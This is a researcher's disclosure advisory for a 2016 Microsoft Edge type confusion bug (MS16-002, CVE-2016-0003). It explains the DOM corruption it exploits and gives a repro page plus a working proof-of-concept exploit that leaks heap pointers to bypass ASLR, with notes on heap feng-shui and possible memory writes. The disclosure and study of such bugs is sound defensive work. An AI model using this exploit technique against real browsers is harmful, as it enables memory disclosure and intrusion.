This is a friendly warning that your web-browser does not currently protecting your privacy and/or security as well as you might want. Click on this message to see more information about the issue(s) that were detected.

MS Edge CDOMText­Node::get_­data type confusion

(MS16-002, CVE-2016-0003)

Specially crafted Javascript inside an HTML page can trigger a type confusion bug in Microsoft Edge that allows accessing a C++ object as if it was a BSTR string. This can result in information disclosure, such as allowing an attacker to determine the value of pointers to other objects and/or functions. This information can be used to bypass ASLR mitigations. It may also be possible to modify arbitrary memory and achieve remote code execution, but this was not investigated.

Known affected software, attack vectors and mitigation

Repro.html <html> <head> <script> document.add­Event­Listener("DOMNode­Removed", function(o­Event) { o­Text­Node = document.create­Text­Node(""); document.body.insert­Before(o­Text­Node); }, true); onload = function(){ document.body.append­Child(o­Existing­Child); for (var o­Node = document.body.first­Child; o­Node && o­Node != o­Node.next­Sibling; // note #1 below o­Node = o­Node.next­Sibling ) { // Doing this seems to be required to avoid triggering an assert. // The tree is corrupt in that o­Text­Node.next­Sibling == o­Text­Node // hence the extra check at #1 to prevent an infinite loop. } alert(o­Text­Node.node­Value); } </script> </head> <body id=o­Parent>x<x id=o­Existing­Child>x</x></body> </html>

Description

Appending one element to its parent in the DOM tree will cause MSIE to first remove the element from its parent, which triggers a DOMNode­Removed event, and then re-append the element as the last child of its original parent. During the DOMNode­Removed event, a Javascript event handler function can modify the DOM tree, e.g. by appending a text node to the parent element. This operation is completed during the event and thus this text node is appended as a child before the element that fired the event is. Once the event handler returns, the element is appended. It appears that the code determines the location where this element should be appended before firing the DOMNode­Removed event handler, and the element is thus inserted as a child of the parent before the text node, rather than after it.

After all this is done, the DOM tree has become corrupted. This can be confirmed by checking that the .next­Sibling property of the text node is the text node itself, i.e. there is a loop in the DOM tree.

Another effect is that reading the .node­Value of the text node will cause the code to confuse a C++ object that Trident/Edge uses to model the DOM tree with a BSTR object that represents the text data stored in the text node. This allows an attacker to read the data stored in this C++ object, which includes various pointers.

Exploit

A Po­C exploit that reads and shows partial content of the DOM tree object was created; it has been tested on x64 systems to show heap pointers, allowing an attacker to undo heap ASLR.

The amount of data read can be controlled by the attacker and data beyond the memory allocated for the C++ object can be read. An attacker may be able to use Heap Feng-Shui to position another object with interesting information in the memory following the C++ DOM tree object and read data from this second object as well.

Finally, setting the node­Value property is possible and caused an access violation when I attempted it. I did not analyze the code path or the reason for the AV; but it is speculated that it may be possible to modify the C++ DOM tree object and/or other memory using this bug. This is of course an even more interesting aspect for an attacker, as it may allow remote code execution.

No attempt to create a Po­C exploit that abuses this issue to undo ASLR and/or execute arbitrary code was made.

Exploit.html <html> <head> <script> var u­Node­Removed­Events = 0; onerror = function (s­Error, s­Source, u­Line){ alert(s­Error + " on line " + u­Line); }; document.add­Event­Listener("DOMNode­Removed", function(o­Event) { if (u­Node­Removed­Events++ == 0) { o­Text­Node = document.create­Text­Node("[2]"); // Note that insert­Before with no second argument is functionally equivalent to append­Child and Edge's // implementation will simply call the append­Child implementation. I have used insert­Before here to make it // easier to identify if a heap block was allocated by this call, or the append­Child call you'll see later: // the stack recorded by page heap does not include "append­Child" here but it does for the later. document.body.insert­Before(o­Text­Node); }; }, true); onload = function(){ // append­Child on an element that has a parent will remove it from the parent first, trigger a DOMNode­Removed // event, then append it as the last child of the new parent and trigger a DOMNode­Inserted event. document.body.append­Child(o­Existing­Child); // However, during the DOMNode­Removed event for o­Existing­Child, the o­Text­Node node is inserted using // append­Child. This second append­Child call is completed first, so the o­Text­Node node is appended as the last // child of the body element first. The DOMNode­Removed event completes and the o­Existing­Child node is then // appended as the second to last child of the body element. For reasons unknown, after this the next­Sibling of // o­Text­Node is corrupted and points to itself, creating a sort of loop in the DOM tree. for (var o­Node = document.body.first­Child; o­Node && o­Node != o­Node.next­Sibling; o­Node = o­Node.next­Sibling) { // Doing this seems to be required to avoid triggering an assert - not sure why, but it might cache the // tree in a way that prevents Edge from detecting that the tree is corrupt. } if (o­Text­Node.next­Sibling !== o­Text­Node) { // This should have happened, but if the bug was triggered, the tree is corrupt and o­Text­Node is its own // sibling. throw new Error("Tree is not corrupt"); } alert("Set breakpoints if needed"); // ^^ You can set a breakpoint during this popup to follow what happens, some suggested locations: // * EDGEHTML!CDOMText­Node::get_­data // * EDGEHTML!CDOMText­Node::get_­length // * EDGEHTML!Tree::Text­Node::Text­Node­From­DOMText­Node // * msvcrt!memcpy_­s // After hitting the breakpoint, you may want to step over code until you return from the call to // Text­Node­From­DOMText­Node. Its return value is a pointer to a structure like this: // struct first_­structure { // DWORD dw­Unknown_00; // flags, value depends on DOM tree at start of repro. // DWORD dw­Unknown_04; // VOID* p­Unknown_08; // VOID* p­Unknown_10; // VOID* p­Unknown_18; // VOID* p­Unknown_20; // BYTE[0x10] b­Unknown_28; // VOID* p­Unknown_38; // points to self or another structure, depends on DOM tree at start of repro. // VOID* p­Unknown_40; // VOID* p­Unknown_48; // VOID* p­Element_50; // points to an C*Element instance // VOID* p­Unknown_58; // BYTE[0x18] b­Unknown_60; // VOID* p­Unknown_78; // VOID* p­Unknown_80; // BYTE[0x10] b­Unknown_88; // VOID* p­Unknown_98; // VOID* p­Unknown_­A0; // BYTE[0x8] b­Unknown_­A8; // } // The second_­structure and third_­structure mentioned above look like this: // struct second_­structure { // DWORD dw­Unknown_00; // flags, value depends on DOM tree at start of repro. // DWORD dw­Unknown_04; // VOID* p­Unknown_08; // VOID* p­Unknown_10; // VOID* p­Unknown_18; // VOID* p­Unknown_20; // BYTE[0x8] b­Unknown_28; // VOID* p­Unknown_30; // VOID* p­Unknown_38; // BYTE[0x10] b­Unknown_40; // } // struct third_­structure { // DWORD dw­Unknown_00; // flags, value depends on DOM tree at start of repro. // DWORD dw­Unknown_04; // VOID* p­Unknown_08; // VOID* p­Unknown_10; // VOID* p­Unknown_18; // VOID* p­Unknown_20; // VOID* p­Element_28; // points to an C*Element instance // VOID* p­Unknown_30; // BYTE[0x18] b­Unknown_38; // VOID* p­Unknown_50; // VOID* p­Unknown_58; // BYTE[0x10] b­Unknown_60; // VOID* p­Unknown_70; // VOID* p­Unknown_78; // BYTE[0x8] b­Unknown_80; // } // These structures are typical structures used by Trident to keep track of the DOM tree. However, the code // appears to confuse them with structures of a type that contain the text data in a Text­Node. The code assumes // that the length of the (BSTR) text data is found at "first_­structure->p­Unknown_38->dw­Unknown_00", and the // BSTR itself at "first_­structure + 0x­C". These two values can be influence through the initial HTML, like so: // copying bytes from first_­structure+0x­C // | first_­structure | *p­Unknown_38 | // Initial HTML: | dw­Unknown_00 | typeof *p­Unknown_38 | dw­Unknown_00 | //-----------------------------------------+--------------+---------------------+--------------+ // x<x id=o­Existing­Child></x> | 0x21 | (self) | 0x21 | // x<x id=o­Existing­Child>x</x> | 0x31 | second_­structure | 0xa4 | // x<x id=o­Existing­Child>x<a></a></x> | 0x31 | third_­structure | 0x422 | // <a>x<x id=o­Existing­Child></x></a> | 0x421 | (self) | 0x421 | // So, "x<x id=o­Existing­Child></x>" is a "safe" value to use, as it will copy 0x21 WCHARs from // first_­structure+0x­C // into a new BSTR; effectively copying bytes 0x0C-0x4E, which is well within the range of the structure. This // allows an attacker to read parts of the first_­structure data, including a number of pointers to heap data. // // If one would like to read information not stored in the first_­structure, some of the other HTML strings may // be used to copy more information than is contained in just the first_­structure: e.g. // "x<x id=o­Existing­Child>x</x>" copies 0xa4 WCHARs, which means bytes 0x0C-0x154, which is well beyond the // extend of the first_­structure data. With page heap enabled, you will see an access violation. Without page // heap and with a bit of heap feng-shui, an attacker may be able to position an object with other interesting // information in the memory following the first_­structure, e.g. an object with a vftable pointer. This would // allow an attacker to read the vftable pointer and determine the location of DLLs in memory. // // To keep this repro simple and reliable, it only attempts to read data from within first_­structure. var s­Data = ("A" + o­Text­Node.node­Value).substr(1); // make a copy var s­Hex­Data = "Read 0x" + s­Data.length.to­String(16); s­Hex­Data += " bytes: ????????`????????"; // first three DWORDs are unknown s­Hex­QWord = "`????????"; // third DWORD is unknown for (var u­Bytes = 4, u­Offset = 4, u­Index = 0; u­Index < s­Data.length; u­Index++) { var s­Hex­Word = s­Data.char­Code­At(u­Index).to­String(16); while (s­Hex­Word.length < 4) s­Hex­Word = "0" + s­Hex­Word; s­Hex­QWord = s­Hex­Word + s­Hex­QWord; u­Bytes += 2; if (u­Bytes == 4) s­Hex­QWord = "`" + s­Hex­QWord; if (u­Bytes == 8) { s­Hex­Data += " " + s­Hex­QWord; s­Hex­QWord = ""; u­Bytes = 0; }; }; if (s­Hex­QWord) { while (s­Hex­QWord.length < 17) { if (s­Hex­QWord.length == 8) s­Hex­QWord += "`"; s­Hex­QWord = "????" + s­Hex­QWord; } s­Hex­Data += " " + s­Hex­QWord; } alert(s­Hex­Data); // This will crash because of the corrupt DOM tree, but it appears to indicate you may be able to modify // data as well as read it. o­Text­Node.node­Value = ""; }; </script> </head> <body>x<x id=o­Existing­Child></x></body> </html>
© Copyright 2016 by Sky­Lined.
Creative Commons License This work is licensed under a Creative Commons Attribution-Non‑Commercial 4.0 International License.

Last updated on 2016-11-21.
If you find this web-site useful and would like to make a donation, you can send bitcoin to 183yyxa9s1s1f7JBp­PHPmz­Q346y91Rx5DX.